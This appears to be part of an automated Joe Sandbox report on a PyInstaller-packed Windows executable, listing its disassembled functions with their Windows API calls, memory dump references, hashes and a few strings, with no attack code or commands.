                                                                                      Function 00007FF7F3DEB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                      • Instruction ID: f25f6201f0aba044079576883f04893202c440ab90d302f24165cf27d36e02d5
                                                                                      • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                      • Instruction Fuzzy Hash: 0F317462E1D51285E7997B95884137DAE60AF40B90FC10335DD7D2B3D2CEBCB48187B2
                                                                                      Function 00007FF7F3DE5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                      • Instruction ID: b58d7c0d78d1c6126c9d7c1a35204663b86478a60ec7d8633fbadbe7675dc44c
                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                      • Instruction Fuzzy Hash: 5911A421A1C64681EBA8BF91941017DEB61AF85FC0FC44231EA5C6FAD6CF3CE48047A2
                                                                                      Function 00007FF7F3DF6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction ID: 14259911fba10b205ab8575d644cddd9fc2360b8aaefc027a9b3d251bded4283
                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction Fuzzy Hash: 1121D732A0CA4286DBA5AF78D480379B6A0FB84B54F984234E77D5BAD9DF3DD4018B50
                                                                                      Function 00007FF7F3DE03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction ID: c9f0d628ee82bd35dae614c88d92064c933dfc9787066245639ea2bcdb687a73
                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction Fuzzy Hash: 5D01A522A0874640E788EFA39900069EA95BF85FE0F884731DE7C2BBD6CE3CD4818351
                                                                                      Function 00007FF7F3DD8E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • LoadLibraryExW.KERNELBASE(?,00007FF7F3DD6476,?,00007FF7F3DD336E), ref: 00007FF7F3DD8EA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 2592636585-0
                                                                                      • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                      • Instruction ID: 9fc1e44ba17649362d64e9a2975b989f7e30fda40dfd432bea0d1264e3c36b2b
                                                                                      • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                      • Instruction Fuzzy Hash: 12D0CD01F3514542EB84B7B7754663591515F89FC0FC8C035EE2D07B89DC3CC0514700
                                                                                      Function 00007FF7F3DED5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7F3DE0C90,?,?,?,00007FF7F3DE22FA,?,?,?,?,?,00007FF7F3DE3AE9), ref: 00007FF7F3DED63A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction ID: 4f944dcf989c4b4655febcb2b889ee8b29304b54bc750c377853fe1727b1abd1
                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction Fuzzy Hash: A5F0FE10F0924B49FFD977F1584177999905F947A4F880734DD3E6E2C5DD6CA4C086B2

                                                                                      Non-executed Functions

                                                                                      Function 00007FF7F3DD89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                      • API String ID: 3832162212-3165540532
                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction ID: a8d80dfe3c9e3fe2b945a64a1ebc6c5d45b083e293a6540627b65f3584598d47
                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction Fuzzy Hash: 0CD18732A09A8286E790AFB4E8942A9B764FF44758F800235DE7D6B7D8DF3CD145C790
                                                                                      Function 00007FF7F3DD83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD842B
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84AE
                                                                                      • DeleteFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84CD
                                                                                      • FindNextFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84DB
                                                                                      • FindClose.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84EC
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                      • String ID: %s\*
                                                                                      • API String ID: 1057558799-766152087
                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction ID: d104ce573da2afe3cc8f65e3ca4dda28ce192aa84e5df8c9beee24b0e23e353d
                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction Fuzzy Hash: 57415521A0C54285EBA1BBB4E4941FAB361FB94754FC00231D97E6B7D8DF3CE5498790
                                                                                      Function 00007FF7F3DDD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3140674995-0
                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction ID: f02e511d704974825d1110e40f2446076dbc38835b2a37fc8baf5b5eafcf440e
                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction Fuzzy Hash: AC314572609B8186EBA09FA0E8807ED7364FB85748F444039DA5D5BBD9DF3CD648C760
                                                                                      Function 00007FF7F3DF5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C45
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                        • Part of subcall function 00007FF7F3DEA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA909
                                                                                        • Part of subcall function 00007FF7F3DEA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA92E
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C34
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 4070488512-0
                                                                                      • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                      • Instruction ID: ce22389b0d4238fabec1117b19ec90c686226e4584af794b52388409d4679bd6
                                                                                      • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                      • Instruction Fuzzy Hash: C4D1D322A0824646E7A4BF71D8801B9E752EF94794FC48135EA3E6F7D9DF3CE44187A0
                                                                                      Function 00007FF7F3DEA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction ID: d277a1c71338f8291452321b88f62b3e03fdd158b2b04791860cff91d12c42ab
                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction Fuzzy Hash: 21319432608F8285DBA4DF74E8802AEB7A4FB85758F900135EAAD57B99DF3CC145CB50
                                                                                      Function 00007FF7F3DF1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 2227656907-0
                                                                                      • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                      • Instruction ID: 9d6aa7df9ac7cfe7ce49a40c7a8e33845df1d62af64414c4ce23ecc254a164ac
                                                                                      • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                      • Instruction Fuzzy Hash: 36B1C762B1869241EBA5ABB195401B9E354FB45BE4FC44231ED7D2FBC9DF3CE4418390
                                                                                      Function 00007FF7F3DF5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                        • Part of subcall function 00007FF7F3DF55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55DC
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 3458911817-0
                                                                                      • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                      • Instruction ID: 5a6dba40920c9645f2ea863ef8199061851d97349b4016abef8d2f7b12cae3e4
                                                                                      • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                      • Instruction Fuzzy Hash: 1A518022A0864246E790FF71D8C11A9E761BF58794FC44135EA7E6B7D9DF3CE44087A0
                                                                                      Function 00007FF7F3DD5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5840
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5852
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5889
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD589B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58B4
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58C6
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58DF
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58F1
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD590D
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD591F
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD593B
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD594D
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5969
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD597B
